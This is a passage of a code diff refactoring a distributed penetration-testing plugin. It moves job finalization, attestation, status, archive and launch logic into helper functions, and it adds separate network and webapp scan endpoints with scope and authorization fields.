ATTESTATION — compute but don't emit timeline yet (inserted at correct point below) - redmesh_test_attestation = None - should_submit_attestation = True - if run_mode == RUN_MODE_CONTINUOUS_MONITORING: - last_attestation_at = job_specs.get("last_attestation_at") - min_interval = self.cfg_attestation_min_seconds_between_submits - if last_attestation_at is not None and now_ts - last_attestation_at < min_interval: - elapsed = round(now_ts - last_attestation_at) - self.P( - f"[ATTESTATION] Skipping test attestation for job {job_id}: " - f"last submitted {elapsed}s ago, min interval is {min_interval}s", - color='y' - ) - should_submit_attestation = False - - if should_submit_attestation: - try: - # Collect node IPs from worker reports for attestation - attestation_node_ips = [ - r.get("node_ip") for r in node_reports.values() - if r.get("node_ip") - ] - redmesh_test_attestation = self._submit_redmesh_test_attestation( - job_id=job_id, - job_specs=job_specs, - workers=workers, - vulnerability_score=risk_score, - node_ips=attestation_node_ips, - ) - if redmesh_test_attestation is not None: - job_specs["last_attestation_at"] = now_ts - except Exception as exc: - import traceback - self.P( - f"[ATTESTATION] Failed to submit test attestation for job {job_id}: {exc}\n" - f" Type: {type(exc).__name__}\n" - f" Args: {exc.args}\n" - f" Traceback:\n{traceback.format_exc()}", - color='r' - ) - - # 8. 
MERGE SCAN METRICS across nodes + store per-node/per-thread metrics - worker_scan_metrics = {} - for addr, report in node_reports.items(): - if report.get("scan_metrics"): - entry = {"scan_metrics": report["scan_metrics"]} - # Attach per-thread breakdown if available - if report.get("thread_scan_metrics"): - entry["threads"] = report["thread_scan_metrics"] - worker_scan_metrics[addr] = entry - node_metrics = [e["scan_metrics"] for e in worker_scan_metrics.values()] - pass_metrics = None - if node_metrics: - pass_metrics = node_metrics[0] if len(node_metrics) == 1 else self._merge_worker_metrics(node_metrics) - - # 9. COMPOSE PassReport - pass_report = PassReport( - pass_nr=job_pass, - date_started=pass_date_started, - date_completed=pass_date_completed, - duration=round(pass_date_completed - pass_date_started, 2) if pass_date_started else 0, - aggregated_report_cid=aggregated_report_cid or "", - worker_reports=worker_metas, - risk_score=risk_score, - risk_breakdown=risk_result["breakdown"] if risk_result else None, - llm_analysis=llm_text, - quick_summary=summary_text, - llm_failed=llm_failed, - findings=flat_findings if flat_findings else None, - scan_metrics=pass_metrics, - worker_scan_metrics=worker_scan_metrics if worker_scan_metrics else None, - redmesh_test_attestation=redmesh_test_attestation, - ) - - # 10. STORE PassReport as single CID - pass_report_cid = self.r1fs.add_json(pass_report.to_dict(), show_logs=False) - if not pass_report_cid: - self.P(f"Failed to store pass report for pass {job_pass} in R1FS", color='r') - continue # skip — don't append partial state to CStore - - # 11. 
UPDATE CStore with lightweight PassReportRef - pass_reports.append(PassReportRef(job_pass, pass_report_cid, risk_score).to_dict()) - - # --- FINALIZING: writing archive --- - job_specs["job_status"] = JOB_STATUS_FINALIZING - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - - # Handle SINGLEPASS - set FINALIZED, build archive, prune CStore - if run_mode == RUN_MODE_SINGLEPASS: - job_specs["job_status"] = JOB_STATUS_FINALIZED - self._emit_timeline_event(job_specs, "scan_completed", "Scan completed") - if redmesh_test_attestation is not None: - self._emit_timeline_event( - job_specs, "blockchain_submit", - "Job-finished attestation submitted", - actor_type="system", - meta={**redmesh_test_attestation, "network": "base-sepolia"} - ) - self.P(f"[SINGLEPASS] Job {job_id} complete. Status set to FINALIZED.") - self._emit_timeline_event(job_specs, "finalized", "Job finalized") - self._build_job_archive(job_key, job_specs) - self._clear_live_progress(job_id, list(workers.keys())) - continue - - # CONTINUOUS_MONITORING logic below - - # Check if soft stop was scheduled — build archive and prune CStore - if job_status == JOB_STATUS_SCHEDULED_FOR_STOP: - job_specs["job_status"] = JOB_STATUS_STOPPED - self._emit_timeline_event(job_specs, "scan_completed", f"Scan completed (pass {job_pass})") - if redmesh_test_attestation is not None: - self._emit_timeline_event( - job_specs, "blockchain_submit", - f"Test attestation submitted (pass {job_pass})", - actor_type="system", - meta={**redmesh_test_attestation, "network": "base-sepolia"} - ) - self.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. 
Status set to STOPPED (soft stop was scheduled)") - self._emit_timeline_event(job_specs, "stopped", "Job stopped") - self._build_job_archive(job_key, job_specs) - self._clear_live_progress(job_id, list(workers.keys())) - continue - - # Schedule next pass — attestation event goes with pass_completed - if redmesh_test_attestation is not None: - self._emit_timeline_event( - job_specs, "blockchain_submit", - f"Test attestation submitted (pass {job_pass})", - actor_type="system", - meta={**redmesh_test_attestation, "network": "base-sepolia"} - ) - interval = job_config.get("monitor_interval", self.cfg_monitor_interval) - jitter = random.uniform(0, self.cfg_monitor_jitter) - job_specs["next_pass_at"] = self.time() + interval + jitter - self._emit_timeline_event(job_specs, "pass_completed", f"Pass {job_pass} completed") - - self.P(f"[CONTINUOUS] Pass {job_pass} complete for job {job_id}. Next pass in {interval}s (+{jitter:.1f}s jitter)") - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - self._clear_live_progress(job_id, list(workers.keys())) - - # Clear from completed_jobs_reports to allow relaunch - self.completed_jobs_reports.pop(job_id, None) - if job_id in self.lst_completed_jobs: - self.lst_completed_jobs.remove(job_id) - - elif run_mode == RUN_MODE_CONTINUOUS_MONITORING and all_finished and next_pass_at and self.time() >= next_pass_at: - # ═══════════════════════════════════════════════════ - # STATE: Interval elapsed, start next pass - # ═══════════════════════════════════════════════════ - job_specs["job_pass"] = job_pass + 1 - job_specs["next_pass_at"] = None - self._emit_timeline_event(job_specs, "pass_started", f"Pass {job_pass + 1} started") - - for addr in workers: - workers[addr]["finished"] = False - workers[addr]["result"] = None - workers[addr]["report_cid"] = None - # end for each worker reset - - self.P(f"[CONTINUOUS] Starting pass {job_pass + 1} for job {job_id}", boxed=True) - 
self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=job_specs) - - # Clear local tracking to allow relaunch - self.completed_jobs_reports.pop(job_id, None) - if job_id in self.lst_completed_jobs: - self.lst_completed_jobs.remove(job_id) - #end for each job - return + """Finalize completed passes and orchestrate continuous monitoring.""" + return maybe_finalize_pass(self) def _get_all_network_jobs(self): @@ -2156,7 +1560,7 @@ def _get_all_network_jobs(self): dict Raw mapping from job keys to specs. """ - all_workers_and_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) + all_workers_and_jobs = PentesterApi01Plugin._get_job_state_repository(self).list_jobs() return all_workers_and_jobs @@ -2202,8 +1606,16 @@ def _get_job_status(self, job_id : str): local_workers = self.scan_jobs.get(job_id) jobs_network_state = self._get_job_from_cstore(job_id) result = {} + reconciled_workers = {} + distributed_incomplete = False + if isinstance(jobs_network_state, dict) and isinstance(jobs_network_state.get("workers"), dict): + reconciled_workers = reconcile_job_workers(self, jobs_network_state) + distributed_incomplete = any( + worker.get("worker_state") not in {"finished", "failed", "unreachable"} + for worker in reconciled_workers.values() + ) # first check if in completed jobs - if job_id in self.lst_completed_jobs: + if job_id in self.lst_completed_jobs and not distributed_incomplete: # dont check in the reports that might contain only from some local workers local_workers_reports = self.completed_jobs_reports[job_id] some_worker = list(local_workers_reports.keys())[0] @@ -2212,7 +1624,8 @@ def _get_job_status(self, job_id : str): "job_id": job_id, "target": target, "status": "completed", - "report": self.completed_jobs_reports[job_id] + "report": self.completed_jobs_reports[job_id], + "workers": reconciled_workers or None, } elif local_workers: @@ -2227,7 +1640,8 @@ def _get_job_status(self, job_id : str): "job_id": job_id, "target": 
jobs_network_state.get("target"), "status": "network_tracked", - "job": jobs_network_state + "job": jobs_network_state, + "workers": reconciled_workers or None, } # Job not found else: @@ -2250,7 +1664,7 @@ def _get_job_status(self, job_id : str): """ @BasePlugin.endpoint - def list_features(self): + def list_features(self, scan_type: str = ""): """ List available service and web test features. @@ -2259,12 +1673,12 @@ def list_features(self): dict Mapping of categories to lists of feature names. """ - result = {"features": self._get_all_features(categs=True)} + result = {"features": self._get_all_features(categs=True, scan_type=scan_type or None)} return result @BasePlugin.endpoint - def get_feature_catalog(self): + def get_feature_catalog(self, scan_type: str = "all"): """ Return the feature catalog with grouped features, labels, and descriptions. @@ -2276,19 +1690,141 @@ def get_feature_catalog(self): dict Feature catalog with categories and all available methods. """ - all_methods = self._get_all_features() + all_methods = self._get_all_features(scan_type=scan_type) return { - "catalog": FEATURE_CATALOG, + "catalog": self._get_feature_catalog(scan_type=scan_type), "all_methods": all_methods, } + def _validation_error(self, message: str): + """Return a consistent validation error payload.""" + return validation_error(message) + + def _parse_exceptions(self, exceptions): + """Normalize port-exception input to a list of ints.""" + return parse_exceptions(self, exceptions) + + def _resolve_enabled_features(self, excluded_features, scan_type=ScanType.NETWORK.value): + """Validate excluded features and derive enabled features for audit/config.""" + return resolve_enabled_features(self, excluded_features, scan_type=scan_type) + + def _resolve_active_peers(self, selected_peers): + """Validate selected peers against chainstore peers and return active peers.""" + return resolve_active_peers(self, selected_peers) + + def _normalize_common_launch_options( + self, + 
distribution_strategy, + port_order, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + nr_local_workers, + ): + """Apply defaults and bounds to common launch settings.""" + return normalize_common_launch_options( + self, + distribution_strategy, + port_order, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + nr_local_workers, + ) + + def _build_network_workers(self, active_peers, start_port, end_port, distribution_strategy): + """Build peer assignments for network scans.""" + return build_network_workers(self, active_peers, start_port, end_port, distribution_strategy) + + def _build_webapp_workers(self, active_peers, target_port): + """Build peer assignments for webapp scans. Every peer gets the same target.""" + return build_webapp_workers(self, active_peers, target_port) + + def _announce_launch( + self, + *, + target, + start_port, + end_port, + exceptions, + distribution_strategy, + port_order, + excluded_features, + run_mode, + monitor_interval, + scan_min_delay, + scan_max_delay, + task_name, + task_description, + active_peers, + workers, + redact_credentials, + ics_safe_mode, + scanner_identity, + scanner_user_agent, + created_by_name, + created_by_id, + nr_local_workers, + scan_type, + target_url, + official_username, + official_password, + regular_username, + regular_password, + weak_candidates, + max_weak_attempts, + app_routes, + verify_tls, + target_config, + allow_stateful_probes, + ): + """Persist immutable config, announce job in CStore, and return launch response.""" + return announce_launch( + self, + target=target, + start_port=start_port, + end_port=end_port, + exceptions=exceptions, + distribution_strategy=distribution_strategy, + port_order=port_order, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + active_peers=active_peers, + 
workers=workers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + scan_type=scan_type, + target_url=target_url, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + ) @BasePlugin.endpoint(method="post") - def launch_test( + def launch_network_scan( self, target: str = "", start_port: int = 1, end_port: int = 65535, - exceptions: str = "64297", #todo format -> list + exceptions: str = "64297", distribution_strategy: str = "", port_order: str = "", excluded_features: list[str] = None, @@ -2307,318 +1843,201 @@ def launch_test( created_by_name: str = "", created_by_id: str = "", nr_local_workers: int = 0, + target_confirmation: str = "", + scope_id: str = "", + authorization_ref: str = "", + engagement_metadata: dict = None, + target_allowlist: list[str] = None, ): - """ - Start a pentest on the specified target. - - Announces the job to the network via CStore; actual execution is handled - asynchronously by worker threads. - - Parameters - ---------- - target : str, optional - Hostname or IP to scan. - start_port : int, optional - Inclusive start port, default 1. - end_port : int, optional - Inclusive end port, default 65535. - exceptions : str, optional - Comma/space separated list of ports to skip. - distribution_strategy: str, optional - "MIRROR" to have all workers scan full range; "SLICE" to split range. - port_order: str, optional - Defines port scanning order at worker-thread level: - "SHUFFLE" to randomize port order; "SEQUENTIAL" for ordered scan. 
- excluded_features: list[str], optional - List of feature names to exclude from scanning. - run_mode: str, optional - "SINGLEPASS" (default) for one-time scan; "CONTINUOUS_MONITORING" for - repeated scans at monitor_interval. - monitor_interval: int, optional - Seconds between passes in CONTINUOUS_MONITORING mode (0 = use config). - scan_min_delay: float, optional - Minimum random delay between scan operations (Dune sand walking). - scan_max_delay: float, optional - Maximum random delay between scan operations (Dune sand walking). - task_name: str, optional - Human-readable name for the task. - task_description: str, optional - Human-readable description for the task. - selected_peers: list[str], optional - List of peer addresses to run the test on. If not provided or empty, - all configured chainstore_peers will be used. Each address must exist - in the chainstore_peers configuration. - nr_local_workers: int, optional - Number of parallel scan threads each worker node spawns (1-16). - The assigned port range is split evenly across threads. 0 = use config default. - - Returns - ------- - dict - Job specification, current worker id, and other active jobs. - - Raises - ------ - ValueError - If no target is provided or if selected_peers contains invalid addresses. - """ - # INFO: This method only announces the job to the network. It does not - # execute the job itself - that part is handled by PentestJob - # executed after periodical check from plugin process. - if not authorized: - raise ValueError( - "Scan authorization required. Confirm you are authorized to scan this target." 
- ) - - if excluded_features is None: - excluded_features = self.cfg_excluded_features or [] - if not target: - raise ValueError("No target specified.") - - start_port = int(start_port) - end_port = int(end_port) - - if start_port > end_port: - raise ValueError("start_port must be less than end_port.") - - if len(exceptions) > 0: - exceptions = [ - int(x) for x in self.re.findall(r'\d+', exceptions) - if x.isdigit() - ] - else: - exceptions = [] - - # Validate excluded_features against known features and calculate enabled_features for audit - all_features = self.__features - if excluded_features: - invalid = [f for f in excluded_features if f not in all_features] - if invalid: - self.P(f"Warning: Unknown features in excluded_features (ignored): {self.json_dumps(invalid)}") - excluded_features = [f for f in excluded_features if f in all_features] - enabled_features = [f for f in all_features if f not in excluded_features] - - self.P(f"Excluded features: {self.json_dumps(excluded_features)}") - self.P(f"Enabled features: {self.json_dumps(enabled_features)}") - - distribution_strategy = str(distribution_strategy).upper() - - if not distribution_strategy or distribution_strategy not in [DISTRIBUTION_MIRROR, DISTRIBUTION_SLICE]: - distribution_strategy = self.cfg_distribution_strategy - - port_order = str(port_order).upper() - if not port_order or port_order not in [PORT_ORDER_SHUFFLE, PORT_ORDER_SEQUENTIAL]: - port_order = self.cfg_port_order - - # Validate run_mode and monitor_interval - run_mode = str(run_mode).upper() - if not run_mode or run_mode not in [RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING]: - run_mode = self.cfg_run_mode - if monitor_interval <= 0: - monitor_interval = self.cfg_monitor_interval - - # Validate scan delays (Dune sand walking) - if scan_min_delay <= 0: - scan_min_delay = self.cfg_scan_min_rnd_delay - if scan_max_delay <= 0: - scan_max_delay = self.cfg_scan_max_rnd_delay - # Ensure min <= max - if scan_min_delay > scan_max_delay: - 
scan_min_delay, scan_max_delay = scan_max_delay, scan_min_delay - - # Validate local workers (parallel scan threads per worker node) - nr_local_workers = int(nr_local_workers) - if nr_local_workers <= 0: - nr_local_workers = self.cfg_nr_local_workers - nr_local_workers = max(LOCAL_WORKERS_MIN, min(LOCAL_WORKERS_MAX, nr_local_workers)) - - # Validate and determine which peers to use - chainstore_peers = self.cfg_chainstore_peers - if not chainstore_peers: - raise ValueError("No workers found in chainstore peers configuration.") - - # Validate selected_peers against chainstore_peers - if selected_peers and len(selected_peers) > 0: - invalid_peers = [p for p in selected_peers if p not in chainstore_peers] - if invalid_peers: - raise ValueError( - f"Invalid peer addresses not found in chainstore_peers: {invalid_peers}. " - f"Available peers: {chainstore_peers}" - ) - active_peers = selected_peers - else: - active_peers = chainstore_peers - - num_workers = len(active_peers) - if num_workers == 0: - raise ValueError("No workers available for job execution.") - - workers = {} - if distribution_strategy == DISTRIBUTION_MIRROR: - for address in active_peers: - workers[address] = { - "start_port": start_port, - "end_port": end_port, - "finished": False, - "result": None - } - # else if selected strategy is SLICE - else: - - total_ports = end_port - start_port + 1 - - base_ports_count = total_ports // num_workers - rem_ports_count = total_ports % num_workers - - current_start = start_port - for i, address in enumerate(active_peers): - if i < rem_ports_count: - size = base_ports_count + 1 - else: - size = base_ports_count - current_end = current_start + size - 1 - - workers[address] = { - "start_port": current_start, - "end_port": current_end, - "finished": False, - "result": None - } - - current_start = current_end + 1 - # end for chainstore_peers - # end if - - # Resolve scanner identity defaults - if not scanner_identity: - scanner_identity = self.cfg_scanner_identity - if 
not scanner_user_agent: - scanner_user_agent = self.cfg_scanner_user_agent + """Launch a network scan using network-specific validation and worker slicing.""" + return launch_network_scan( + self, + target=target, + start_port=start_port, + end_port=end_port, + exceptions=exceptions, + distribution_strategy=distribution_strategy, + port_order=port_order, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + ) - job_id = self.uuid(8) - self.P(f"Launching {job_id=} {target=} with {exceptions=}") - self.P(f"Announcing pentest to workers (instance_id {self.cfg_instance_id})...") + @BasePlugin.endpoint(method="post") + def launch_webapp_scan( + self, + target_url: str = "", + excluded_features: list[str] = None, + run_mode: str = "", + monitor_interval: int = 0, + scan_min_delay: float = 0.0, + scan_max_delay: float = 0.0, + task_name: str = "", + task_description: str = "", + selected_peers: list[str] = None, + redact_credentials: bool = True, + ics_safe_mode: bool = True, + scanner_identity: str = "", + scanner_user_agent: str = "", + authorized: bool = False, + created_by_name: str = "", + created_by_id: str = "", + official_username: str = "", + official_password: str = "", + regular_username: str = "", + regular_password: str = "", + weak_candidates: list[str] = None, + max_weak_attempts: int = 5, + app_routes: 
list[str] = None, + verify_tls: bool = True, + target_config: dict = None, + allow_stateful_probes: bool = False, + target_confirmation: str = "", + scope_id: str = "", + authorization_ref: str = "", + engagement_metadata: dict = None, + target_allowlist: list[str] = None, + ): + """Launch a graybox webapp scan using webapp-specific validation and mirrored worker assignment.""" + return launch_webapp_scan( + self, + target_url=target_url, + excluded_features=excluded_features, + run_mode=run_mode, + monitor_interval=monitor_interval, + scan_min_delay=scan_min_delay, + scan_max_delay=scan_max_delay, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, + redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, + scanner_identity=scanner_identity, + scanner_user_agent=scanner_user_agent, + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + official_username=official_username, + official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, + ) - # Build immutable job config and persist to R1FS - job_config = JobConfig( + @BasePlugin.endpoint(method="post") + def launch_test( + self, + target: str = "", + start_port: int = 1, end_port: int = 65535, + exceptions: str = "64297", #todo format -> list + distribution_strategy: str = "", + port_order: str = "", + excluded_features: list[str] = None, + run_mode: str = "", + monitor_interval: int = 0, + scan_min_delay: float = 0.0, + scan_max_delay: float = 0.0, + task_name: str = "", + task_description: str = 
"", + selected_peers: list[str] = None, + redact_credentials: bool = True, + ics_safe_mode: bool = True, + scanner_identity: str = "", + scanner_user_agent: str = "", + authorized: bool = False, + created_by_name: str = "", + created_by_id: str = "", + nr_local_workers: int = 0, + scan_type: str = "network", + target_url: str = "", + official_username: str = "", + official_password: str = "", + regular_username: str = "", + regular_password: str = "", + weak_candidates: list[str] = None, + max_weak_attempts: int = 5, + app_routes: list[str] = None, + verify_tls: bool = True, + target_config: dict = None, + allow_stateful_probes: bool = False, + target_confirmation: str = "", + scope_id: str = "", + authorization_ref: str = "", + engagement_metadata: dict = None, + target_allowlist: list[str] = None, + ): + """Compatibility shim that routes to scan-type-specific launch endpoints.""" + return launch_test( + self, target=target, start_port=start_port, end_port=end_port, exceptions=exceptions, distribution_strategy=distribution_strategy, port_order=port_order, - nr_local_workers=nr_local_workers, - enabled_features=enabled_features, excluded_features=excluded_features, run_mode=run_mode, + monitor_interval=monitor_interval, scan_min_delay=scan_min_delay, scan_max_delay=scan_max_delay, - ics_safe_mode=ics_safe_mode, + task_name=task_name, + task_description=task_description, + selected_peers=selected_peers, redact_credentials=redact_credentials, + ics_safe_mode=ics_safe_mode, scanner_identity=scanner_identity, scanner_user_agent=scanner_user_agent, - task_name=task_name, - task_description=task_description, - monitor_interval=monitor_interval, - selected_peers=active_peers, - created_by_name=created_by_name or "", - created_by_id=created_by_id or "", - authorized=True, - ) - job_config_cid = self.r1fs.add_json(job_config.to_dict(), show_logs=False) - if not job_config_cid: - self.P("Failed to store job config in R1FS — aborting launch", color='r') - return {"error": 
"Failed to store job config in R1FS"} - - job_specs = { - "job_id" : job_id, - # Listing fields (duplicated from config for zero-fetch listing) - "target": target, - "task_name": task_name, - "start_port" : start_port, - "end_port" : end_port, - "risk_score": 0, - "date_created": self.time(), - # Orchestration - "launcher": self.ee_addr, - "launcher_alias": self.ee_id, - "timeline": [], - "workers" : workers, - # Job lifecycle: RUNNING | SCHEDULED_FOR_STOP | STOPPED | FINALIZED - "job_status": JOB_STATUS_RUNNING, - # Continuous monitoring fields - "run_mode": run_mode, - "job_pass": 1, - "next_pass_at": None, - "pass_reports": [], - # Config CID (written once at launch) - "job_config_cid": job_config_cid, - } - self._emit_timeline_event( - job_specs, "created", - f"Job created by {created_by_name}", - actor=created_by_name, - actor_type="user" - ) - self._emit_timeline_event(job_specs, "started", "Scan started", actor=self.ee_id, actor_type="node") - - try: - redmesh_job_start_attestation = self._submit_redmesh_job_start_attestation( - job_id=job_id, - job_specs=job_specs, - workers=workers, - ) - if redmesh_job_start_attestation is not None: - job_specs["redmesh_job_start_attestation"] = redmesh_job_start_attestation - self._emit_timeline_event( - job_specs, "blockchain_submit", - "Job-start attestation submitted", - actor_type="system", - meta={**redmesh_job_start_attestation, "network": "base-sepolia"} - ) - except Exception as exc: - import traceback - self.P( - f"[ATTESTATION] Failed to submit job-start attestation for job {job_id}: {exc}\n" - f" Type: {type(exc).__name__}\n" - f" Args: {exc.args}\n" - f" Traceback:\n{traceback.format_exc()}", - color='r' - ) - - self.chainstore_hset( - hkey=self.cfg_instance_id, - key=job_id, - value=job_specs + authorized=authorized, + created_by_name=created_by_name, + created_by_id=created_by_id, + nr_local_workers=nr_local_workers, + scan_type=scan_type, + target_url=target_url, + official_username=official_username, + 
official_password=official_password, + regular_username=regular_username, + regular_password=regular_password, + weak_candidates=weak_candidates, + max_weak_attempts=max_weak_attempts, + app_routes=app_routes, + verify_tls=verify_tls, + target_config=target_config, + allow_stateful_probes=allow_stateful_probes, + target_confirmation=target_confirmation, + scope_id=scope_id, + authorization_ref=authorization_ref, + engagement_metadata=engagement_metadata, + target_allowlist=target_allowlist, ) - self._log_audit_event("scan_launched", { - "job_id": job_id, - "target": target, - "start_port": start_port, - "end_port": end_port, - "launcher": self.ee_addr, - "enabled_features_count": len(enabled_features), - "redact_credentials": redact_credentials, - "ics_safe_mode": ics_safe_mode, - }) - - all_network_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) - report = {} - for other_key, other_spec in all_network_jobs.items(): - normalized_key, normalized_spec = self._normalize_job_record(other_key, other_spec) - if normalized_key and normalized_key != job_id: - report[normalized_key] = normalized_spec - #end for - - self.P(f"Current jobs:\n{self.json_dumps(all_network_jobs, indent=2)}") - result = { - "job_specs": job_specs, - "worker": self.ee_addr, - "other_jobs": report, - } - return result - @BasePlugin.endpoint def get_job_status(self, job_id: str): @@ -2641,366 +2060,80 @@ def get_job_status(self, job_id: str): @BasePlugin.endpoint def get_job_data(self, job_id: str): - """ - Retrieve job data from CStore. - - For finalized/stopped jobs (stubs): returns the lightweight stub as-is. - The frontend uses job_cid to fetch the full archive via get_job_archive(). - - For running jobs: returns CStore state with pass_reports trimmed to - the last 5 entries (frontend fetches those CIDs individually). - - Parameters - ---------- - job_id : str - Identifier of the job. - - Returns - ------- - dict - Job data or error if not found. 
- """ - job_specs = self._get_job_from_cstore(job_id) - if not job_specs: - return { - "job_id": job_id, - "found": False, - "message": "Job not found in network store.", - } - - # Finalized stubs have job_cid — return as-is - if job_specs.get("job_cid"): - return { - "job_id": job_id, - "found": True, - "job": job_specs, - } - - # Running jobs — trim pass_reports to last 5 - pass_reports = job_specs.get("pass_reports", []) - if isinstance(pass_reports, list) and len(pass_reports) > 5: - job_specs["pass_reports"] = pass_reports[-5:] - - return { - "job_id": job_id, - "found": True, - "job": job_specs, - } + """Retrieve job data from CStore.""" + return get_job_data(self, job_id) @BasePlugin.endpoint - def get_job_archive(self, job_id: str): - """ - Retrieve the full job archive from R1FS. - - For finalized/stopped jobs only. Returns the complete archive including - job config, all passes, timeline, and ui_aggregate in a single response. - - Parameters - ---------- - job_id : str - Identifier of the job. - - Returns - ------- - dict - Full archive or error. 
- """ - job_specs = self._get_job_from_cstore(job_id) - if not job_specs: - return {"error": "not_found", "message": f"Job {job_id} not found."} - - job_cid = job_specs.get("job_cid") - if not job_cid: - return {"error": "not_available", "message": f"Job {job_id} is still running (no archive yet)."} - - archive = self.r1fs.get_json(job_cid) - if archive is None: - return {"error": "fetch_failed", "message": f"Failed to fetch archive from R1FS (CID: {job_cid})."} + def get_job_archive( + self, + job_id: str, + summary_only: bool = False, + pass_offset: int = 0, + pass_limit: int = 0, + ): + """Retrieve the full job archive from R1FS.""" + return get_job_archive( + self, + job_id, + summary_only=summary_only, + pass_offset=pass_offset, + pass_limit=pass_limit, + ) - # Integrity check: verify job_id matches - if archive.get("job_id") != job_id: - self.P( - f"[INTEGRITY] Archive CID {job_cid} has job_id={archive.get('job_id')}, expected {job_id}", - color='r' - ) - return {"error": "integrity_mismatch", "message": "Archive job_id does not match requested job_id."} + @BasePlugin.endpoint + def get_job_triage(self, job_id: str, finding_id: str = ""): + """Retrieve mutable analyst triage state for archived findings.""" + return get_job_triage(self, job_id, finding_id) - return {"job_id": job_id, "archive": archive} + @BasePlugin.endpoint + def update_finding_triage( + self, + job_id: str, + finding_id: str, + status: str, + note: str = "", + actor: str = "", + review_at: float = 0, + ): + """Update append-only analyst triage state for one archived finding.""" + return update_finding_triage( + self, + job_id=job_id, + finding_id=finding_id, + status=status, + note=note, + actor=actor, + review_at=review_at, + ) @BasePlugin.endpoint def get_job_progress(self, job_id: str): - """ - Real-time progress for all workers in a job. - - Reads from the `:live` CStore hset and returns only entries - matching the requested job_id. 
- - Parameters - ---------- - job_id : str - Identifier of the job. - - Returns - ------- - dict - Workers progress keyed by worker address. - """ - live_hkey = f"{self.cfg_instance_id}:live" - all_progress = self.chainstore_hgetall(hkey=live_hkey) or {} - prefix = f"{job_id}:" - result = {} - for key, value in all_progress.items(): - if key.startswith(prefix) and value is not None: - worker_addr = key[len(prefix):] - result[worker_addr] = value - # Include job status so the frontend knows when to reload full data - job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) - status = None - if isinstance(job_specs, dict): - status = job_specs.get("status") - return {"job_id": job_id, "status": status, "workers": result} + """Real-time progress for all workers in a job.""" + return get_job_progress(self, job_id) @BasePlugin.endpoint def list_network_jobs(self): - """ - List all network jobs stored in CStore. - - Finalized stubs are returned as-is (already lightweight). - Running jobs are stripped of timeline, workers detail, and pass_reports - to keep the listing payload small. - - Returns - ------- - dict - Normalized job specs keyed by job_id. 
- """ - raw_network_jobs = self.chainstore_hgetall(hkey=self.cfg_instance_id) - normalized_jobs = {} - for job_key, job_spec in raw_network_jobs.items(): - normalized_key, normalized_spec = self._normalize_job_record(job_key, job_spec) - if normalized_key and normalized_spec: - # Finalized stubs (have job_cid) — already small, return as-is - if normalized_spec.get("job_cid"): - normalized_jobs[normalized_key] = normalized_spec - continue - - # Running jobs — allowlist only listing-essential fields - normalized_jobs[normalized_key] = { - "job_id": normalized_spec.get("job_id"), - "job_status": normalized_spec.get("job_status"), - "target": normalized_spec.get("target"), - "task_name": normalized_spec.get("task_name"), - "risk_score": normalized_spec.get("risk_score", 0), - "run_mode": normalized_spec.get("run_mode"), - "start_port": normalized_spec.get("start_port"), - "end_port": normalized_spec.get("end_port"), - "date_created": normalized_spec.get("date_created"), - "launcher": normalized_spec.get("launcher"), - "launcher_alias": normalized_spec.get("launcher_alias"), - "worker_count": len(normalized_spec.get("workers", {}) or {}), - "pass_count": len(normalized_spec.get("pass_reports", []) or []), - "job_pass": normalized_spec.get("job_pass", 1), - } - return normalized_jobs + """List all network jobs stored in CStore.""" + return list_network_jobs(self) @BasePlugin.endpoint def list_local_jobs(self): - """ - List jobs currently running on this worker. - - Returns - ------- - dict - Mapping job_id to status payload. - """ - jobs = { - job_id: self._get_job_status(job_id) - for job_id, local_workers in self.scan_jobs.items() - } - return jobs + """List jobs currently running on this worker.""" + return list_local_jobs(self) @BasePlugin.endpoint def stop_and_delete_job(self, job_id : str): - """ - Stop a running job, mark it stopped, then delegate to purge_job - for full R1FS + CStore cleanup. 
